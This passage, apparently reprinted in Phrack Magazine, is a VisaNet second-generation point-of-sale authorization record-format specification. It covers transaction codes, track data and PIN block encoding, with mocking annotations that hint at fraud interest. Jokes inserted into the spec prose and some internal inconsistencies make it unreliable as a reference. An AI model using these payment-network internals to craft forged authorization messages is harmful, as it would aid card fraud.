    4.46 LOCAL TRANSACTION TIME
    4.47 SYSTEM TRACE AUDIT NUMBER
    4.48 ORIGINAL AUTHORIZATION TRANSACTION CODE
    4.49 NETWORK IDENTIFICATION CODE
    4.50 FIELD SEPARATOR

5.0 RESPONSE RECORD DATA ELEMENT DEFINITIONS
    5.01 PAYMENT SERVICE INDICATOR
    5.02 STORE NUMBER
    5.03 TERMINAL NUMBER
    5.04 AUTHORIZATION SOURCE CODE
    5.05 TRANSACTION SEQUENCE NUMBER
    5.06 RESPONSE CODE
    5.07 APPROVAL CODE
    5.08 LOCAL TRANSACTION DATE
    5.09 AUTHORIZATION RESPONSE CODE
    5.10 AVS RESULT CODE
    5.11 TRANSACTION IDENTIFIER
    5.12 FIELD SEPARATOR
    5.13 VALIDATION CODE
    5.14 FIELD SEPARATOR
    5.15 NETWORK IDENTIFICATION CODE
    5.16 SETTLEMENT DATE
    5.17 SYSTEM TRACE AUDIT NUMBER
    5.18 RETRIEVAL REFERENCE NUMBER
    5.19 LOCAL TRANSACTION TIME

6.0 CONFIRMATION RECORD DATA ELEMENT DEFINITIONS
    6.01 NETWORK IDENTIFICATION CODE
    6.02 SETTLEMENT DATE
    6.03 SYSTEM TRACE AUDIT NUMBER

7.0 CHARACTER CODE DEFINITIONS
    7.01 TRACK 1 CHARACTER DEFINITION
    7.02 TRACK 2 CHARACTER DEFINITION
    7.03 AUTHORIZATION MESSAGE CHARACTER SET
    7.04 CHARACTER CONVERSION SUMMARY
    7.05 ACCOUNT DATA LUHN CHECK
    7.06 CALCULATING AN LRC
    7.07 TEST DATA FOR RECORD FORMAT "J"
      7.07.1 TEST DATA FOR A FORMAT "J" AUTHORIZATION REQUEST
      7.07.2 RESPONSE MESSAGE FOR TEST DATA

-------------------------------------------------------------------------------

1.0 INTRODUCTION

This document describes the request and response record formats for the VisaNet
second generation Point-Of-Sale (POS) authorization terminals and VisaNet
Authorization services.  This document describes only record formats.  Other
documents describe communication protocols and POS equipment processing
requirements.  Figure 1.0 represents the authorization request which is
transmitted to VisaNet using public communication services and the
authorization response returned by VisaNet.  Debit transactions include a
third confirmation message.

POS DEVICE                                          VISANET
----------                                          -------

AUTHORIZATION
  REQUEST
    |           TRANSMITTED TO A
    |---------->    VISANET                       AUTHORIZATION
                 AUTHORIZATION                      RESPONSE
                  HOST SYSTEM                          |
                                                       |
                             RETURNED BY THE           |
                             VISANET HOST TO  <--------|
                             THE POS TERMINAL

DEBIT RESPONSE
CONFIRMATION--------------->TRANSMITTED TO
                            HOST SYSTEM

                                   FIGURE 1.0
                      Authorization request and response.

This document describes the record formats to be used for the development of
new applications.  Current formats or transition formats will be provided on
request.  The usage of some fields have changed with the new record formats.
Applications which were developed to previous specifications will continue to
be supported by VisaNet services.  The new formats and field usage is provided
with the intention of moving all new applications developed to the new formats.

2.0 APPLICABLE DOCUMENTS

   The following documents provide additional definitions and background.

2.01 RELATED VISA DOCUMENTS FOR AUTHORIZATION

  1. EIS1051 - External Interface Specification
                   Second Generation
            Authorization Link Level Protocol

2.02 RELATED VISA DOCUMENTS FOR DATA CAPTURE

   1. EIS1081 - External Interface Specification
                    Second Generation
              Data Capture Record Formats

   2. EIS1052 - External Interface Specification
                    Second Generation
              Data Capture Link Level Protocol

3.0 AUTHORIZATION RECORD FORMATS

This section contains the record formats for the authorization request,
response and confirmation records.  The ANSI X3.4 character set is used to
represent all record data elements.  (See Section 7)

In the record formats on the following pages, the column heading FORMAT is
defined as:

"NUM"  represents numeric data, the numbers 0 through 9, NO SPACES.
"A/N"  represents alphanumeric data, the printing character set.
"FS"   represents a field separator character as defined in ANSI X3.4 as
       a "1C" hex

3.01 REQUEST RECORD FORMAT

Table 3.01b provides the record format for the authorization request records.
Section 4 provides the data element definitions.

The authorization request record is a variable length record.  The record
length will depend on the source of the customer data and the type of
authorization request.  Refer to Table 3.01c to determine which GROUPS to use
from Table 3.01a

TABLE 3.01a IS PROVIDED FOR REFERENCE REASONS ONLY.  ALL NEW APPLICATIONS
            SHOULD USE ONE OF THE FOLLOWING RECORD FORMATS:

RECORD  | APPLICATION |
FORMAT  |    TYPE     | REMARKS
-------------------------------------------------------------------------------
   J    |   CREDIT    | All non-ATM card transactions (Visa cards, other credit
        |             | cards, private label credit cards and check guarantee)
   G    | DIAL DEBIT  | Visa supported ATM debit cards

The selection of format type J and G or any other value from Table 3.01a will
depend on the VisaNet services that are desired.  Contact your Visa POS member
support representative for assistance in determining the required formats.

                                  TABLE 3.01a
                             Record Format Summary

 Non-CVV       CVV       Terminal
Compliant   Compliant   Generation   Description
-------------------------------------------------------------------------------
                0                    RESERVED
    1           N         First      Vutran
    2           8         First      Sweda
    4           R         First      Verifone
    6           P         First      Amex
    7           3         First      Racal
    A           Q         First      DMC
    B           R         First      GTE & Omron    [velly intelestink]
    C           9         First      Taltek
    S           U         First      Datatrol - Standard Oil
    D           T         First      Datatrol
    E                                RESERVED
    5           F         Second     Non-REPS-Phase 1 CVV
                G         Second     Dial Debit
                H         Second     Non-REPS-Phase 2 CVV
                I         Second     RESERVED - Non-REPS Controller
                J         Second     REPS - Terminal & Controller
                K         Second     RESERVED
                L         Second     RESERVED - Leased VAP
                M         Second     RESERVED - Member Format
               N-O                   RESERVED
               V-Y                   RESERVED
                Z         Second     RESERVED - SDLC Direct [hmmm]
-------------------------------------------------------------------------------

                                  TABLE 3.01b
             Second Generation Authorization Request Record Format

                                                                        see
Group  Byte#  Length  Format  Name                                    section
-------------------------------------------------------------------------------
         1      1      A/N    Record Format                             4.01
         2      1      A/N    Application Type                          4.02
         3      1      A/N    Message Delimiter                         4.03
        4-9     6      NUM    Acquirer Bin                              4.04
       10-21   12      NUM    Merchant Number                           4.05
       22-25    4      NUM    Store Number                              4.06
       26-29    4      NUM    Terminal Number                           4.07
       30-33    4      NUM    Merchant Category Code                    4.08
       34-36    3      NUM    Merchant Country Code                     4.09
       37-41    5      A/N    Merchant City Code (ZIP in the U.S.)      4.10
       42-44    3      NUM    Time Zone Differential                    4.11
       45-46    2      A/N    Authorization Transaction Code            4.12
       47-54    8      NUM    Terminal Identification Number            4.13
        55      1      A/N    Payment Service Indicator                 4.14
       56-59    4      NUM    Transaction Sequence Number               4.15
        60      1      A/N    Cardholder Identification Code            4.16
        61      1      A/N    Account Data Field                        4.17
     Variable  1-76           Customer Data Field                       4.18.x
                              (See: DEFINITIONS in Table 3.01d)
     Variable   1      "FS"   Field Separator                           4.19
     Variable  0-32    A/N    Cardholder Identification Data            4.20
     Variable   1      "FS"   Field Separator                           4.21
     Variable  3-12    NUM    Transaction Amount                        4.22
     Variable   1      "FS"   Field Separator                           4.23
     Variable   2      A/N    Device Code/Industry Code                 4.24
     Variable   1      "FS"   Field Separator                           4.25
     Variable  0-6     NUM    Issuing/Receiving Institution ID          4.26
 I   Variable   1      "FS"   Field Separator                           4.27
     Variable  3-12    NUM    Secondary Amount (Cashback)               4.28
II   Variable   1      "FS"   Field Separator                           4.29
     Variable   25     A/N    Merchant Name                             4.30
     Variable   13     A/N    Merchant City                             4.31
     Variable   2      A/N    Merchant State                            4.33
     Variable  1-14    A/N    Sharing Group                             4.33
     Variable   1      "FS"   Field Separator                           4.34
     Variable  0-12    NUM    Merchant ABA                              4.35
     Variable  0-4     NUM    Merchant Settlement Agent Number          4.36
     Variable   1      "FS"   Field Separator                           4.37
     Variable   6      NUM    Agent Number                              4.38
     Variable   6      NUM    Chain Number                              4.39
     Variable   3      NUM    Batch Number                              4.40
     Variable   1      A/N    Reimbursement Attribute                   4.41
III  Variable   1      "FS"   Field Separator                           4.42
     Variable   6      A/N    Approval Code                             4.43
     Variable   4      NUM    Settlement Date (MMDD)                    4.44
     Variable   4      NUM    Local Transaction Date (MMDD)             4.45
     Variable   6      NUM    Local Transaction Time (HHMMSS)           4.46
     Variable   6      A/N    System Trace Audit Number                 4.47
     Variable   2      A/N    Original Auth. Transaction Code           4.48
     Variable   1      A/N    Network Identification Code               4.49
IV   Variable   1      "FS"   Field Separator                           4.50

NOTE: The maximum length request can be as long as 290 bytes for an Interlink
Debit Cancel request (including the STX/ETX/LRC).  Since some terminals may be
limited to a 256 byte message buffer, the following tips can save up to 36
bytes:

     - Limit fields 4.22 and 4.28 to 7 digits
     - Fields 4.26, 4.35 and 4.36 are not required for a debit request
     - Field 4.33 can be limited to 10 bytes

                                  TABLE 3.01C
                      Legend for GROUP (from Table 3.01b)

FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS      RECORD
                                                          I  II III IV   FORMAT

Check guarantee                                           X                J

Non-ATM card transactions (Visa cards, other              X  X             J
credit cards, private label credit cards

Visa supported ATM debit cards: Purchase, Return          X  X   X         G
and Inquiry Request

Visa supported ATM debit cards: Interlink Cancel          X  X   X   X     G
Request

                                  TABLE 3.01d
             Definitions for Customer Data Field (from Table 3.01b)

Length        Format        Field Name                                   See
                                                                       Section
MAGNETICALLY read credit cards (SELECT ONE):
up to 76       A/N          Track 1 Read Data                           4.18.1
up to 37       NUM          Track 2 Read Data                           4.18.2

MANUALLY entered credit cards:
up to 28       NUM          Manually Entered Account Number            4.18.3.1
   1           "FS"         Field Separator
   4           NUM          Manually Entered Expiration Date (MMYY)   4.18.3.2

MACHINE read and MANUALLY entered check acceptance requests:
 1 to 28       A/N          Check Acceptance ID                        4.18.4.1
   1           "FS"         Field Separator                            4.18.4.2
 3 to 6        A/N          Manually Entered Check Acceptance Data     4.18.4.2

MAGNETICALLY read ATM debit cards:
up to 37       NUM          Track 2 Read Data                           4.18.2

3.02 RESPONSE RECORD FORMAT

Table 3.02a provides the record format for the authorization response records.
Section 5 provides the data element definitions.

The authorization response record is variable length for record formats "J" &
"G".  Refer to Table 3.02b to determine which GROUPS to use from Table 3.02a.

                                  Table 3.02a
                Second Generation Authorization Response Record
                                                                        see
Group  Byte#  Length  Format  Name                                    section
--------------------------------------------------------------------------------
        1       1      A/N    Payment Service Indicator                 5.01
       2-5      4      NUM    Store Number                              5.02
       6-9      4      NUM    Terminal Number                           5.03
        10      1      A/N    Authorization Source Code                 5.04
      11-14     4      NUM    Transaction Sequence Number               5.05
      15-16     2      A/N    Response Code                             5.06
      17-22     6      A/N    Approval Code                             5.07
      23-28     6      NUM    Local Transaction Date (MMDDYY)           5.08
      29-44     16     A/N    Authorization Response Message            5.09
       45       1      A/N    AVS Result Code                           5.10
    Variable   0/15    NUM    Transaction Identifier                    5.11
    Variable    1      "FS"   Field Separator                           5.12
    Variable   0/4     A/N    Validation Code                           5.13
I   Variable    1      "FS"   Field Separator                           5.14
    Variable    1      A/N    Network Identification Code               5.15
    Variable    4      NUM    Settlement Date (MMDD)                    5.16
    Variable    6      A/N    System Trace Audit Number                 5.17
    Variable    12     A/N    Retrieval Reference Number                5.18
II  Variable    6      NUM    Local Transaction Time (HHMMSS)           5.19

                                  Table 3.02b
                      Legend for GROUP (from Table 3.02a)

FOR THESE TRANSACTIONS, USE--------------------------------->GROUPS      RECORD
                                                             I   II      FORMAT

All non-ATM card transactions (Visa cards, other credit      X             J
cards, private label credit cards and check guarantee)

Visa supported ATM debit cards: Purchase, Return, Inquiry    X    X        G
Request and Interlink Cancel Request

3.03 CONFIRMATION RECORD FORMAT (ATM DEBIT ONLY)

Table 3.03 provides the record format for the second generation debit response
confirmation record.  Section 6 provides the data element definitions.

The debit response confirmation record is a fixed length record.

                                   TABLE 3.03
              Second Generation Debit Response Confirmation Record

                                                                        see
Group  Byte#  Length  Format  Name                                    section
--------------------------------------------------------------------------------
         1      1      A/N    Network ID Code                           6.01
        2-5     4      NUM    Settlement Date (MMDD)                    6.02
I       6-11    6      A/N    System Trace Audit Number                 6.03

4.0 REQUEST RECORD DATA ELEMENT DEFINITIONS

The following subsections will define the authorization request record data
elements.

4.01 RECORD FORMAT

There are several message formats defined within the VisaNet systems.  The
second generation authorization format is specified by placing one of the
defined values in the record format field.  Table 4.01 provides a brief summary
of the current formats.

                                   TABLE 4.01
                VisaNet Authorization Record Format Designators

RECORD FORMAT                        RECORD DESCRIPTION
--------------------------------------------------------------------------------
      J             All non-ATM card transactions (Visa cards, other credit
                    cards, private label credit cards and check guarantee)
      G             Visa supported ATM debit cards

4.02 APPLICATION TYPE

The VisaNet authorization system supports multiple application types ranging
from single thread first generation authorization to interleaved leased line
authorization processing.  Table 4.02 provides a summary of application type.

                                   TABLE 4.02
                        VisaNet Application Designators

APPLICATION                                                        USE WITH
   TYPE             APPLICATION DESCRIPTION                        REC. FMT.
--------------------------------------------------------------------------------
    0               Single authorization per connection             J and G
    2               Multiple authorizations per connection          J and G
                    single-threaded
    4               Multiple authorizations per connect,               J
                    interleaved
    6               Reserved for future use                           ---
    8               Reserved for future use                           ---
 1,3,5,7            Reserved for VisaNet Central Data Capture (CDC)   ---
    9               Reserved for VisaNet Down Line Load               ---
   A-Z              Reserved for future use                           ---

4.03 MESSAGE DELIMITER

The message delimiter separates the format and application type designators from
the body of the message.  The message delimiter is defined as a "." (period)

4.04 ACQUIRER BIN

This field contains the Visa assigned six-digit Bank Identification Number (BIN)
The acquirer BIN identifies the merchant signing member that signed the merchant
using the terminal.

NOTE: The merchant receives this number from their signing member.

4.05 MERCHANT NUMBER

This field contains a NON-ZERO twelve digit number, assigned by the signing
member and/or the merchant, to identify the merchant within the member systems.
The combined Acquirer BIN and Merchant Number are required to identify the
merchant within the VisaNet systems.

4.06 STORE NUMBER

This field contains a NON-ZERO four-digit number assigned by the signing member
and/or the merchant to identify the merchant store within the member systems.
The combined Acquirer BIN, Merchant Number, and Store Number are required to
identify the store within the VisaNet systems.

4.07 TERMINAL NUMBER

This field contains a NON-ZERO four-digit number assigned by the signing member
and/or the merchant to identify the merchant store within the member systems.
This field can be used by systems which use controllers and/or concentrators to
identify the devices attached to the controllers and/or concentrators.

4.08 MERCHANT CATEGORY CODE

This field contains a four-digit number assigned by the signing member from a
list of category codes defined in the VisaNet Merchant Data Standards Handbook
to identify the merchant type.

4.09 MERCHANT COUNTRY CODE

This field contains a three-digit number assigned by the signing member from a
list of country codes defined in the VisaNet V.I.P. System Message Format
Manuals to identify the merchant location country.

4.10 MERCHANT CITY CODE

This field contains a five character code used to further identify the merchant
location.  Within the United States, the give high order zip code digits of the
address of the store location are used.  Outside of the United States, this
field will be assigned by the signing member.

4.11 TIME ZONE DIFFERENTIAL

This field contains a three-digit code used to calculate the local time within
the VisaNet authorization system.  It is calculated by the signing member,
providing the local time zone differential from Greenwich Mean Time (GMT).  The
first two digits specify the magnitude of the differential.  Table 4.11 provides
a brief summary of the Time Zone Differential codes.

                                   TABLE 4.11
                       Time Zone Differential Code Format

   Byte #     Length     Format                     Contents
--------------------------------------------------------------------------------
     1          1        NUMERIC          DIRECTION
                                          0 = Positive, Local Ahead of GMT,
                                              offset in hours
                                          1 = Negative, Local Time behind GMT,
                                              offset in hours
                                          2 = Positive, offset in 15 minute
                                              increments
                                          3 = Negative, offset in 15 minute
                                              increments
                                          4 = Positive, offset in 15 minute
                                              increments, participating in
                                              daylight savings time
                                          5 = Negative, offset in 15 minute
                                              increments, participating in
                                              daylight savings time
                                        6-9 = INVALID CODES
   2-3           2       NUMERIC           MAGNITUDE
                                           For Byte #1 = 0 or 1
                                               0 <= MAGNITUDE <= 12
                                           For Byte #1 = 2 through 5
                                               0 <= MAGNITUDE <= 48
--------------------------------------------------------------------------------
A code of 108 indicates the local Pacific Standard time which is 8 hours behind
GMT.

4.12 AUTHORIZATION TRANSACTION CODE

This field contains a two-character code defined by VisaNet and generated by the
terminal identifying the type of transaction for which the authorization is
requested.  Table 4.12 provides a summary of the transaction codes.

                                   TABLE 4.12
                        Authorization Transaction Codes

TRAN
CODE       TRANSACTION DESCRIPTION
-------------------------------------------------------------------------------
54         Purchase
55         Cash Advance
56         Mail/Telephone Order
57         Quasi Cash
58         Card Authentication - Transaction Amt & Secondary Amt must equal
           $0.00, AVS may be requested [ah-hah!]
64         Repeat: Purchase
65         Repeat: Cash Advance
66         Repeat: Mail/Telephone Order (MO/TO)
67         Repeat: Quasi Cash
68         Repeat: Card Authentication - Transaction Amt & Secondary Amt must
           equal $0.00, AVS may be requested
70         Check guarantee, must include RIID (field 4.26)
81         Proprietary Card
84         Private Label Purchase
85         Private Label, Cash Advance
86         Private Label Mail/Telephone Order (MO/TO)
87         Private Label Quasi Cash
88         Private Label Card Authentication - Transaction Amt & Secondary Amt
           must equal $0.00, AVS may be requested
93         Debit Purchase
94         Debit Return
95         Interlink Debit Cancel (see NOTE below)
--------------------------------------------------------------------------------

NOTE (for TRANSACTION CODE = 95)
--------------------------------
    - For Interlink Debit CANCEL request message, all of the fields in
      Groups I and II will come from the original transaction request or the
      original transaction response, with the exception of the following:
         - The AUTHORIZATION TRANSACTION CODE will need to be changed to the
           Debit CANCEL code.
         - The TRANSACTION SEQUENCE NUMBER should be incremented in the
           normal fashion.
         - The CUSTOMER DATA FIELD and the CARDHOLDER IDENTIFICATION DATE
           (PIN) will need to be re-entered.

4.13 TERMINAL IDENTIFICATION NUMBER

This field contains an eight-digit code that must be greater than zero, defined
by the terminal down line load support organization.  Support may be provided by
the Visa's Merchant Assistance Center (MAC), the signing member, or a third
party organization.  The terminal ID is used to uniquely identify the terminal
in the terminal support system and identification for the VisaNet Central Data
Capture (CDC).  The terminal ID may not be unique within the VisaNet system.
Each terminal support provider and member that provides its own terminal support
can assign potentially identical terminal IDs within its system.  The terminal
ID can be used by the terminal down line load system to access the terminal
application and parameter data from a system data base when down line loading a
terminal. [huh?]

NOTE: It is recommended that [the] Terminal ID Number should be unique within
the same Acquirer's BIN.

4.14 PAYMENT SERVICE INDICATOR

This is a one-character field used to indicate a request for REPS qualification.
Table 4.14 provides a summary of the codes.

                                   TABLE 4.14
                        Payment Service Indicator Codes

                         RECORD
                         FORMAT    VALUE    DESCRIPTION
                         ------------------------------
                           J         Y         Yes
                           J         N         No
                           G         Y         Yes
                           G         N         No
                         ------------------------------ [repetitive? you bet]

4.15 TRANSACTION SEQUENCE NUMBER

This field contains a four-digit code which is generated by the terminal as the
sequence number for the transaction.  The sequence number is used by the
terminal to match request and response messages.  This field is returned by
VisaNet without sequence verification.  The sequence number is incremented with
wrap from 9999 to 0001.

4.16 CARDHOLDER IDENTIFICATION CODE

This one-character field contains a code that indicates the method used to
identify the cardholder.  Table 4.16 provides a summary of the codes.

                                   TABLE 4.16
                        Cardholder Identification Codes

  ID CODE     IDENTIFICATION METHOD
--------------------------------------------------------------------------------
     A        Personal Identification Number-23 byte static key (non-USA) fnord
     B        PIN at Automated Dispensing Machine - 32 byte static key
     C        Self Svc Limited Amount Terminal (No ID method available)
     D        Self-Service Terminal            (No ID method available)
     E        Automated Gas Pump               (No ID method available)
     K        Personal Identification Number - 32 byte DUK/PT
     N        Customer Address via Address Verification Service (AVS)
     S        Personal Identification Number - 32 byte static key
     Z        Cardholder Signature - Terminal has a PIN pad
     @        Cardholder Signature - No PIN pad available
F-J,L,M,O-R   Reserved for future use
    T-Y
--------------------------------------------------------------------------------

4.17 ACCOUNT DATA SOURCE

This field contains a one-character code defined by Visa and generated by the
terminal to indicate the source of the customer data entered in field 4.18.
Table 4.17 provides a summary of codes

                                   TABLE 4.17
                           Account Data Source Codes

ACCOUNT DATA
SOURCE CODE      ACCOUNT DATA SOURCE CODE DESCRIPTION
--------------------------------------------------------------------------------
     A           RESERVED - Bar-code read
     B           RESERVED - OCR read
     D           Mag-stripe read, Track 2
     H           Mag-stripe read, Track 1
     Q           RESERVED - Manually keyed, bar-code capable terminal
     R           RESERVED - Manually keyed, OCR capable terminal
     T           Manually keyed, Track 2 capable
     X           Manually keyed, Track 1 capable
     @           Manually keyed, terminal has no card reading capability
C,E-G,I-P,S,     RESERVED for future use
U-W,Y-Z,0-9
--------------------------------------------------------------------------------
NOTE:
   - If a dual track reading terminal is being used, be sure to enter the
     correct value of "D" or "H" for the magnetic data that is transmitted
   - When data is manually keyed at a dual track reading terminal, enter either
     a "T" or an "X"

4.18 CUSTOMER DATA FIELD

This is a variable length field containing customer account or check acceptance
ID data in one of three formats.  The cardholder account information can be read
d from the card or it may be entered manually.  Additionally the terminal can be
used for check authorization processing with the check acceptance identification
number entered by the operator for transmission in this field.

NOTE: For all POS terminals operated under VISA U.S.A. Operating Regulations,
the following requirement must be available as an operating option if the
merchant location is found to be generating a disproportionately high percentage
of Suspect Transactions [lets get downright hostile about it] as defined in
chapter 9.10 of the VISA U.S.A. Operating Regulations.  Specifically, chapter
9.10.B.2 requires that:

   - The terminal must read the track data using a magnetic stripe reading
     terminal
   - The terminal must prompt the wage slave to manually enter the last four
     digits of the account number
   - The terminal must compare the keyed data with the last four digits of the
     account number in the magnetic stripe
   - If the compare is successful, the card is acceptable to continue in the
     authorization process and the terminal must transmit the full, unaltered
     contents of the magnetic stripe in the authorization message.
   - If the compare fails, the card should not be honored at the Point of Sale

4.18.1 TRACK 1 READ DATA

This is a variable length field with a maximum data length of 76 characters.

The track 1 data read from the cardholder's card is checked for parity and LRC
errors and then converted from the six-bit characters encoded on the card to
seven-bit characters as defined in ANSI X3.4.  The character set definitions are
provided in section 7 for reference.  As part of the conversion the terminal
will strip off the starting sentinel, ending sentinel, and LRC characters.  The
separators are to be converted to a "^" (HEX 5E) character.  The entire
track must be provided in the request message.  The character set and data
content are different between track 1 and track 2.  The data read by a track 2
device can not be correctly reformatted and presented as though it were read by
a track 1 device.  [aw shucks]  The converted data can not be modified by adding
or deleting non-framing characters and must be a one-for-one representation of
the character read from the track.

4.18.2 TRACK 2 READ DATA

This is a variable length field with a maximum data length of 37 characters.

The track 2 data read from the cardholder's card is checked for parity and LRC
errors and then converted from the six-bit characters encoded on the card to
seven-bit characters as defined in ANSI X3.4.  The character set definitions are
provided in section 7 for reference.  As part of the conversion the terminal
will strip off the starting sentinel, ending sentinel, and LRC characters.  The
separators are to be converted to a  "^" (HEX 5E) character.  The entire
track must be provided in the request message.  The character set and data
content are different between track 2 and track 1.  The data read by a track 1
device can not be correctly reformatted and presented as though it were read by
a track 2 device.  The converted data can not be modified by adding or deleting
non-framing characters and must be a one-for-one representation of the character
read from the track. [repetitive? you bet]

4.18.3 MANUALLY ENTERED ACCOUNT DATA (CREDIT CARD)

The customer credit card data may be key entered when the card can not be read,
when a card is not present, or when a card reader is not available.

4.18.3.1 MANUALLY ENTERED ACCOUNT NUMBER

This is a variable length field consisting of 5 to 28 alphanumeric characters.

The embossed cardholder data, that is key entered, is validated by the terminal
using rules for each supported card type.  For example, both Visa and Master
Card include a mod 10 check digit as the last digit of the Primary Account
Number.  The Primary Account Number (PAN) is encoded as seven-bit characters
as defined in ANSI X3.4.  The PAN is then provided in the manually entered
record format provided in Table 3.01b.  The PAN must be provided without
embedded spaces.

4.18.3.2 MANUALLY ENTERED EXPIRATION DATE

This four-digit field contains the card expiration date in the form MMYY (month-
month-year-year)

4.18.4 CHECK ACCEPTANCE IDENTIFICATION NUMBER

The customer data may be card read or manually key entered for check acceptance
transactions.

4.18.4.1 CHECK ACCEPTANCE ID

This field is a variable length field consisting of 1 to 28 alphanumeric
characters.  The check acceptance vendor will provide the data format and
validation rules to be used by the terminal.  Typically the ID consists of a
two-digit state code and an ID which may be the customer's drivers license
number.

4.18.4.2 MANUALLY ENTERED CHECK ACCEPTANCE DATA

This six-character field contains the customer birth date or a control code in
the form specified by the check acceptance processor.

4.19 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.

4.20 CARDHOLDER IDENTIFICATION DATA

This field will be 0, 23, 29 or 32 characters in length.  The cardholder ID
codes shown in Table 4.16 indicates the type of data in this field.  Table
4.20 provides a brief summary of the current formats.

                                   TABLE 4.20
                   Cardholder Identification Data Definitions

CARDHOLDER                                                       VALUE(S) FROM
ID LENGTH     DESCRIPTION                                          TABLE 4.16
--------------------------------------------------------------------------------
   0          Signature ID used, No PIN pad is present             @,C,D or E
   0          Signature ID used on a terminal with a PIN pad           Z
  23          A PIN was entered on a STATIC key PIN pad                A
  32          A PIN was entered on a STATIC key PIN pad                B
  32          A PIN was entered on a DUK/PT key PIN pad                K
  32          A PIN was entered on a STATIC key PIN pad                S
0 to 29       AVS was requested                                        N
--------------------------------------------------------------------------------

4.20.1 STATIC KEY WITH TWENTY THREE BYTE CARDHOLDER ID

NOTE: The 23 byte static key technology is NOT approved for use in terminals
deployed in the Visa U.S.A. region.  [thanks nsa!]

When a PIN is entered on a PIN pad supporting 23 byte static key technology, the
terminal will generate the following data:

   1JFxxyyaaaaaaaaaaaaaaaa

   Where:
        1J   Header - PIN was entered

        f    Function Key Indicator - A single byte indicating which, if any,
             function key was pressed on the PIN pad.  This field is currently
             not edited.  Any printable character is allowed.

        xx   PIN Block Format - These two numeric bytes indicate the PIN
             encryption method used to create the encrypted PIN block.  Visa
             currently supports four methods; 01, 02, 03, & 04.  For more
             information, please refer to the VisaNet Standards Manual, Card
             Technology Standards, PIN and Security Standards, Section 2,
             Chapter 3, PIN Block Formats

        aaaaaaaaaaaaaaaa   Expanded Encrypted PIN Block Data - The encrypted
             PIN block format consists of 64 bits of data.  Since the VisaNet
             Second Generation protocol allows only printable characters in
             data fields, these 64 bits must be expanded to ensure that no
             values less than hex "20" are transmitted.  To expand the 64 bit
             encrypted PIN block, remove four bits at a time and convert them
             to ANSI X3.4 characters using Table 4.20.  After this conversion,
             the 64 bit encrypted PIN block will consist of 16 characters that
             will be placed in the Expanded Encrypted PIN Block Data field.

4.20.2 STATIC KEY WITH THIRTY TWO BYTE CARDHOLDER ID

When a PIN is entered on a PIN pad supporting 32 byte static key technology,
the terminal will generate the following data:

       aaaaaaaaaaaaaaaa2001ppzz00000000

      Where:
         aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
              PIN block format consists of 64 bits of data.  Since the
              VisaNet Second Generation protocol allows only printable
              characters in data fields, these 64 bits must be expanded to
              ensure that no values less than hex "20" are transmitted.  To
              expand the 64 bit encrypted PIN block, remove four bits at a
              time and convert them to ANSI X3.4 characters using table 4.20.
              After this conversion, the 64 bit encrypted PIN block will
              consist of 16 characters that will be placed in the Expanded
              Encrypted PIN Block Data field.

         20 - Security Format Code - This code defines that the Zone
              Encryption security technique was used.

         01 - PIN Encryption Algorithm Identifier - This code defines that the
              ANSI DES encryption technique was used.

         pp - PIN Block Format Code - This code describes the PIN block format
              was used by the acquirer.  Values are:
                 01 - Format is based on the PIN, the PIN length, selected
                      rightmost digits of the account number and the pad
                      characters "0" and "F"; combined through an exclusive
                      "OR" operation.
                 02 - Format is based on the PIN, the PIN length and a user
                      specified numeric pad character.
                 03 - Format is based on the PIN and the "F" pad character.
                 04 - Format is the same as "01" except that the leftmost
                      account number digits are selected.

         zz - Zone Key Index - This index points to the zone key used by the
              acquirer to encrypt the PIN block.  Values are:
                 01 - First key
                 02 - Second key

         00000000 - Visa Reserved - Must be all zeros

For additional information, refer to the VisaNet manual V.I.P. System, Message
Formats, Section B: Field Descriptions.  Specifically, fields 52 and 53;
Personal Identification Number (PIN) Data and Security Related Control
Information respectively.

4.20.3 DUK/PT KEY WITH THIRTY TWO BYTE CARDHOLDER ID

When a PIN is entered on a PIN pad supporting DUK/PT technology, the terminal
will generate the following 32 bytes:

     aaaaaaaaaaaaaaaakkkkkkssssssssss

     Where:
         aaaaaaaaaaaaaaaa - Expanded Encrypted PIN Block Data - The encrypted
              PIN block format consists of 64 bits of data.  Since the
              VisaNet Second Generation protocol allows only printable
              characters in data fields, these 64 bits must be expanded to
              ensure that no values less than hex "20" are transmitted.  To
              expand the 64 bit encrypted PIN block, remove four bits at a
              time and convert them to ANSI X3.4 characters using table 4.20.
              After this conversion, the 64 bit encrypted PIN block will
              consist of 16 characters that will be placed in the Expanded
              Encrypted PIN Block Data field.  [repetitive? you bet]

         kkkkkk - Key Set Identifier (KSID) - Is represented by a unique, Visa
              Visa assigned, six digit bank identification number.

         ssssssssss - Expanded TRSM ID (PIN Pad Serial Number) & Expanded
              Transaction Counter - Is represented by the concatenation of these
              two hexadecimal fields.  The PIN pad serial number is stored as
              five hex digits minus one bit for a total of 19 bits of data.  The
              transaction counter is stored as five hex digits plus one bit for
              a total of 21 bits of data.  These two fields concatenated
              together will contain 40 bits.  Since the VisaNet Second
              Generation protocol allows only printable characters in data
              fields, these 40 bits must be expanded to ensure that no values
              less than hex "20" are transmitted.  To expand this 40 bit field,
              remove four bits at a time and convert them to ASCII characters
              using table 4.20.  After this conversion, this 40 bit field will
              consist of 10 characters that will be placed in the Expanded
              TRSM ID & Expanded Transaction Counter Field.

                                   TABLE 4.20
                           PIN Block conversion Table

                       HEXADECIMAL   |    ANSI X3.4
                          DATA       |    CHARACTER
                       --------------+----------------
                          0000       |        0
                          0001       |        1
                          0010       |        2
                          0011       |        3
                          0100       |        4
                          0101       |        5
                          0110       |        6
                          0111       |        7
                          1000       |        8
                          1001       |        9
                          1010       |        A
                          1011       |        B
                          1100       |        C
                          1101       |        D
                          1110       |        E
                          1111       |        F
                       -------------------------------

4.20.4 ADDRESS VERIFICATION SERVICE DESCRIPTION [ah enlightenment]

When Address Verification Service is requested, this field will contain the
mailing address of the cardholder's monthly statement.  The format of this
field is:
                      <street address><apt no.><zip code>
                                       or
                       <post office box number><zipcode>

Numbers are not spelled out.  ("First Street" becomes "1ST Street", "Second"
becomes "2ND", etc)  "Spaces" are only required between a numeral and the ZIP
code.  For instance:
                             1391 ELM STREET 40404
     is equivalent to:       1931ELMSTREET40404

                             P.O. Box 24356 55555
     is not equivalent to    P.O.BOX2435655555

If a field is not available or not applicable, it may be skipped.  If nine
digits are available, the last five digits should always be used to pour more
sand into the wheels of progress.

4.21 FIELD SEPARATOR

The authorization record format specifies the use of the "FS" character.


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

